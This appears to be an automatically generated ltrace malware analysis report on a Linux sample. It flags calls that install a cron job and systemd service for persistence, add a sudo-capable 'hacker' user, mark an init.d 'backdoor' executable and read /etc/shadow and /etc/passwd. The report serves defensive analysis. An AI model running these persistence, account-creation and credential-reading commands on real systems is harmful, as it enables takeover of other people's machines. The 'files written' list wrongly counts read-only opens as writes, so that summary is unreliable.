================================================================================
LTRACE MALWARE ANALYSIS REPORT
================================================================================

## SUMMARY STATISTICS
--------------------------------------------------------------------------------
Total Function Calls: 53
Suspicious Activities: 35

Calls by Category:
  FILE_OPS            :    11
  OUTPUT              :     4
  PROCESS             :    10
  STRING_OPS          :    20
  OTHER               :     8

## SUSPICIOUS ACTIVITIES
--------------------------------------------------------------------------------

[1] strlen()
    Flags: Temp directory access, Cron job
    Call: strlen("echo '*/5 * * * * /tmp/.hidden_malware' | crontab -"...) = 51

[2] memcpy()
    Flags: Temp directory access, Cron job
    Call: memcpy(0x5601dedf14a8, "echo '*/5 * * * * /tmp/.hidden_malware' | crontab -\0...) = 0x5601dedf14a8

[3] strlen()
    Flags: Temp directory access, Cron job
    Call: strlen("echo '*/5 * * * * /tmp/.hidden_malware' | crontab -"...) = 51

[4] strcmp()
    Flags: Cron job
    Call: strcmp("crontab", "for"...) = -3

[5] strcmp()
    Flags: Cron job
    Call: strcmp("crontab", "elif"...) = -2

[6] fopen()
    Flags: Systemd service, Service file
    Call: fopen("/usr/lib/systemd/system/malware.service", "w"...) = 0x558ffc4cf6b0

[7] chmod()
    Flags: Systemd service, Service file
    Call: chmod("/usr/lib/systemd/system/malware.service", 0755...) = 0

[8] printf()
    Flags: Systemd service, Service file
    Call: printf("[+] Installed: %s\n", "/usr/lib/systemd/system/malware.service"...) = 55

[9] strlen()
    Flags: Service file
    Call: strlen(".service"...) = 8

[10] memchr()
    Flags: Service file
    Call: memchr("Unit firewalld.service not loaded.", '\0', 34...) = 0

[11] strlen()
    Flags: Service file
    Call: strlen("systemctl enable malware-persist.service"...) = 40

[12] memcpy()
    Flags: Service file
    Call: memcpy(0x5599b22a94a8, "systemctl enable malware-persist.service\0", 41...) = 0x5599b22a94a8

[13] strlen()
    Flags: Service file
    Call: strlen("systemctl enable malware-persist.service"...) = 40

[14] fopen()
    Flags: System config access
    Call: fopen("/etc/shadow", "r"...) = 0x558ffc4cf6b0

[15] printf()
    Flags: System config access
    Call: printf("[+] Reading: %s\n", "/etc/shadow"...) = 25

[16] access()
    Flags: System config access
    Call: access("/etc/shadow", 0...) = 0

[17] access()
    Flags: System config access
    Call: access("/etc/shadow", 0...) = 0

[18] strncmp()
    Flags: System config access
    Call: strncmp("/etc/shadow", "/etc/", 5...) = 0

[19] chmod()
    Flags: Systemd service, Service file
    Call: chmod("/usr/lib/systemd/system/malware.service", 0755...) = 0

[20] chmod()
    Flags: System config access
    Call: chmod("/etc/init.d/backdoor", 0755...) = 0

[21] fopen()
    Flags: System config access
    Call: fopen("/etc/passwd", "r"...) = 0x558ffc4cf6b0

[22] printf()
    Flags: System config access
    Call: printf("[+] Reading: %s\n", "/etc/passwd"...) = 25

[23] fgets()
    Flags: System config access
    Call: fgets("# their home directory in /etc/passwd to avoid a spurious warning.\n"...) = 0x7ffe81c357d0

[24] strlen()
    Flags: System config access
    Call: strlen("# their home directory in /etc/passwd to avoid a spurious warning.\n"...) = 67

[25] strspn()
    Flags: System config access
    Call: strspn("# their home directory in /etc/passwd to avoid a spurious warning.", ...) = 0

[26] fgets()
    Flags: Password reference
    Call: fgets("# Password aging controls:\n", 1024, 0x563801c442a0...) = 0x7ffe81c357d0

[27] strlen()
    Flags: Password reference
    Call: strlen("# Password aging controls:\n"...) = 27

[28] strspn()
    Flags: Password reference
    Call: strspn("# Password aging controls:", " \t"...) = 0

[29] fgets()
    Flags: Password reference
    Call: fgets("#\tPASS_MAX_DAYS\tMaximum number of days a password may be used.\n", ...) = 0x7ffe81c357d0

[30] strlen()
    Flags: Password reference
    Call: strlen("#\tPASS_MAX_DAYS\tMaximum number of days a password may be used.\n"...) = 63

[31] fopen()
    Flags: System config access
    Call: fopen("/etc/shadow", "r"...) = 0x558ffc4cf6b0

[32] printf()
    Flags: System config access
    Call: printf("[+] Reading: %s\n", "/etc/shadow"...) = 25

[33] access()
    Flags: System config access
    Call: access("/etc/shadow", 0...) = 0

[34] access()
    Flags: System config access
    Call: access("/etc/shadow", 0...) = 0

[35] strncmp()
    Flags: System config access
    Call: strncmp("/etc/shadow", "/etc/", 5...) = 0

## DETAILED ANALYSIS BY CATEGORY
================================================================================

### FILE_OPS
--------------------------------------------------------------------------------
Total calls: 11

Function breakdown:
  fopen                         :     4 calls
  access                        :     4 calls
  chmod                         :     3 calls

Sample calls (showing first 10):
  fopen("/usr/lib/systemd/system/malware.service", "w"...) = 0x558ffc4cf6b0
  chmod("/usr/lib/systemd/system/malware.service", 0755...) = 0
  fopen("/etc/shadow", "r"...) = 0x558ffc4cf6b0
  access("/etc/shadow", 0...) = 0
  access("/etc/shadow", 0...) = 0
  chmod("/usr/lib/systemd/system/malware.service", 0755...) = 0
  chmod("/etc/init.d/backdoor", 0755...) = 0
  fopen("/etc/passwd", "r"...) = 0x558ffc4cf6b0
  fopen("/etc/shadow", "r"...) = 0x558ffc4cf6b0
  access("/etc/shadow", 0...) = 0
  ... and 1 more calls

### OUTPUT
--------------------------------------------------------------------------------
Total calls: 4

Function breakdown:
  printf                        :     4 calls

Sample calls (showing first 10):
  printf("[+] Installed: %s\n", "/usr/lib/systemd/system/malware.service"...) = 55
  printf("[+] Reading: %s\n", "/etc/shadow"...) = 25
  printf("[+] Reading: %s\n", "/etc/passwd"...) = 25
  printf("[+] Reading: %s\n", "/etc/shadow"...) = 25

### PROCESS
--------------------------------------------------------------------------------
Total calls: 10

Function breakdown:
  fork                          :     5 calls
  execve                        :     5 calls

Sample calls (showing first 10):
  fork(...) = 28292
  fork(...) = 28293
  fork(...) = 28294
  fork(...) = 28295
  fork(...) = 28309
  execve(0x559f1111cea9, 0x7ffdedb9e190, 0x7ffdedb9e188, 0x7f9c46a0a5d8...) = -1
  execve(0x559f1111ce92, 0x7ffdedb9e190, 0x7ffdedb9e188, 0x7f9c46a0a5d8...) = -1
  execve(0x5564754c4faf, 0x7fffe0db98f0, 0x7fffe0db98e8, 0x7f78c760a5d8...) = -1
  execve(0x5564754c4faf, 0x7fffe0db98f0, 0x7fffe0db98e8, 0x7f78c760a5d8...) = -1
  execve(0x5564754c4f98, 0x7fffe0db9900, 0x7fffe0db98f8, 0x7f78c760a5d8...) = -1

### STRING_OPS
--------------------------------------------------------------------------------
Total calls: 20

Function breakdown:
  strlen                        :    12 calls
  memcpy                        :     4 calls
  strcmp                        :     4 calls

Sample calls (showing first 10):
  strlen("echo '*/5 * * * * /tmp/.hidden_malware' | crontab -"...) = 51
  memcpy(0x5601dedf14a8, "echo '*/5 * * * * /tmp/.hidden_malware' | crontab -\0...) = 0x5601dedf14a8
  strlen("echo '*/5 * * * * /tmp/.hidden_malware' | crontab -"...) = 51
  strcmp("crontab", "for"...) = -3
  strcmp("crontab", "elif"...) = -2
  strlen(".service"...) = 8
  strlen("systemctl enable malware-persist.service"...) = 40
  memcpy(0x5599b22a94a8, "systemctl enable malware-persist.service\0", 41...) = 0x5599b22a94a8
  strlen("systemctl enable malware-persist.service"...) = 40
  strlen("usermod -aG sudo hacker"...) = 23
  ... and 10 more calls

## FILE OPERATIONS DETAIL
--------------------------------------------------------------------------------

Unique files accessed: 4
  - /etc/init.d/backdoor
  - /etc/passwd
  - /etc/shadow
  - /usr/lib/systemd/system/malware.service

Files written/modified:
  - /usr/lib/systemd/system/malware.service (fopen)
  - /etc/shadow (fopen)
  - /etc/passwd (fopen)
  - /etc/shadow (fopen)

## PROCESS OPERATIONS DETAIL
--------------------------------------------------------------------------------
  fork(...) = 28292
  fork(...) = 28293
  fork(...) = 28294
  fork(...) = 28295
  fork(...) = 28309
  execve(0x559f1111cea9, 0x7ffdedb9e190, 0x7ffdedb9e188, 0x7f9c46a0a5d8...) = -1
  execve(0x559f1111ce92, 0x7ffdedb9e190, 0x7ffdedb9e188, 0x7f9c46a0a5d8...) = -1
  execve(0x5564754c4faf, 0x7fffe0db98f0, 0x7fffe0db98e8, 0x7f78c760a5d8...) = -1
  execve(0x5564754c4faf, 0x7fffe0db98f0, 0x7fffe0db98e8, 0x7f78c760a5d8...) = -1
  execve(0x5564754c4f98, 0x7fffe0db9900, 0x7fffe0db98f8, 0x7f78c760a5d8...) = -1

## EXECUTION TIMELINE (Last 50 calls)
--------------------------------------------------------------------------------
[STRING_OPS] strcmp("crontab", "for"......) = -3 ⚠️ SUSPICIOUS
[STRING_OPS] strcmp("crontab", "elif"......) = -2 ⚠️ SUSPICIOUS
[FILE_OPS] fopen("/usr/lib/systemd/system/malware.service", "w"......) = 0x558ffc4cf6b0 ⚠️ SUSPICIOUS
[FILE_OPS] chmod("/usr/lib/systemd/system/malware.service", 0755......) = 0 ⚠️ SUSPICIOUS
[OUTPUT] printf("[+] Installed: %s\n", "/usr/lib/systemd/system/malware.serv...) = 55 ⚠️ SUSPICIOUS
[STRING_OPS] strlen(".service"......) = 8 ⚠️ SUSPICIOUS
[OTHER] memchr("Unit firewalld.service not loaded.", '\0', 34......) = 0 ⚠️ SUSPICIOUS
[STRING_OPS] strlen("systemctl enable malware-persist.service"......) = 40 ⚠️ SUSPICIOUS
[STRING_OPS] memcpy(0x5599b22a94a8, "systemctl enable malware-persist.service\0"...) = 0x5599b22a94a8 ⚠️ SUSPICIOUS
[STRING_OPS] strlen("systemctl enable malware-persist.service"......) = 40 ⚠️ SUSPICIOUS
[STRING_OPS] strlen("usermod -aG sudo hacker"......) = 23
[STRING_OPS] memcpy(0x56307b69e4a8, "usermod -aG sudo hacker\0", 24......) = 0x56307b69e4a8
[STRING_OPS] strlen("usermod -aG sudo hacker"......) = 23
[STRING_OPS] strlen("useradd -m -s /bin/bash hacker"......) = 30
[STRING_OPS] memcpy(0x5654897f44a8, "useradd -m -s /bin/bash hacker\0", 31......) = 0x5654897f44a8
[STRING_OPS] strlen("useradd -m -s /bin/bash hacker"......) = 30
[STRING_OPS] strcmp("useradd", "for"......) = 15
[STRING_OPS] strcmp("useradd", "until"......) = 5
[FILE_OPS] fopen("/etc/shadow", "r"......) = 0x558ffc4cf6b0 ⚠️ SUSPICIOUS
[OUTPUT] printf("[+] Reading: %s\n", "/etc/shadow"......) = 25 ⚠️ SUSPICIOUS
[FILE_OPS] access("/etc/shadow", 0......) = 0 ⚠️ SUSPICIOUS
[FILE_OPS] access("/etc/shadow", 0......) = 0 ⚠️ SUSPICIOUS
[OTHER] strncmp("/etc/shadow", "/etc/", 5......) = 0 ⚠️ SUSPICIOUS
[PROCESS] fork(......) = 28292
[PROCESS] fork(......) = 28293
[PROCESS] fork(......) = 28294
[PROCESS] fork(......) = 28295
[PROCESS] fork(......) = 28309
[PROCESS] execve(0x559f1111cea9, 0x7ffdedb9e190, 0x7ffdedb9e188, 0x7f9c46a0a5...) = -1
[PROCESS] execve(0x559f1111ce92, 0x7ffdedb9e190, 0x7ffdedb9e188, 0x7f9c46a0a5...) = -1
[PROCESS] execve(0x5564754c4faf, 0x7fffe0db98f0, 0x7fffe0db98e8, 0x7f78c760a5...) = -1
[PROCESS] execve(0x5564754c4faf, 0x7fffe0db98f0, 0x7fffe0db98e8, 0x7f78c760a5...) = -1
[PROCESS] execve(0x5564754c4f98, 0x7fffe0db9900, 0x7fffe0db98f8, 0x7f78c760a5...) = -1
[FILE_OPS] chmod("/usr/lib/systemd/system/malware.service", 0755......) = 0 ⚠️ SUSPICIOUS
[FILE_OPS] chmod("/etc/init.d/backdoor", 0755......) = 0 ⚠️ SUSPICIOUS
[FILE_OPS] fopen("/etc/passwd", "r"......) = 0x558ffc4cf6b0 ⚠️ SUSPICIOUS
[OUTPUT] printf("[+] Reading: %s\n", "/etc/passwd"......) = 25 ⚠️ SUSPICIOUS
[OTHER] fgets("# their home directory in /etc/passwd to avoid a spurious w...) = 0x7ffe81c357d0 ⚠️ SUSPICIOUS
[STRING_OPS] strlen("# their home directory in /etc/passwd to avoid a spurious w...) = 67 ⚠️ SUSPICIOUS
[OTHER] strspn("# their home directory in /etc/passwd to avoid a spurious w...) = 0 ⚠️ SUSPICIOUS
[OTHER] fgets("# Password aging controls:\n", 1024, 0x563801c442a0......) = 0x7ffe81c357d0 ⚠️ SUSPICIOUS
[STRING_OPS] strlen("# Password aging controls:\n"......) = 27 ⚠️ SUSPICIOUS
[OTHER] strspn("# Password aging controls:", " \t"......) = 0 ⚠️ SUSPICIOUS
[OTHER] fgets("#\tPASS_MAX_DAYS\tMaximum number of days a password may be ...) = 0x7ffe81c357d0 ⚠️ SUSPICIOUS
[STRING_OPS] strlen("#\tPASS_MAX_DAYS\tMaximum number of days a password may be ...) = 63 ⚠️ SUSPICIOUS
[FILE_OPS] fopen("/etc/shadow", "r"......) = 0x558ffc4cf6b0 ⚠️ SUSPICIOUS
[OUTPUT] printf("[+] Reading: %s\n", "/etc/shadow"......) = 25 ⚠️ SUSPICIOUS
[FILE_OPS] access("/etc/shadow", 0......) = 0 ⚠️ SUSPICIOUS
[FILE_OPS] access("/etc/shadow", 0......) = 0 ⚠️ SUSPICIOUS
[OTHER] strncmp("/etc/shadow", "/etc/", 5......) = 0 ⚠️ SUSPICIOUS

================================================================================
END OF REPORT
================================================================================
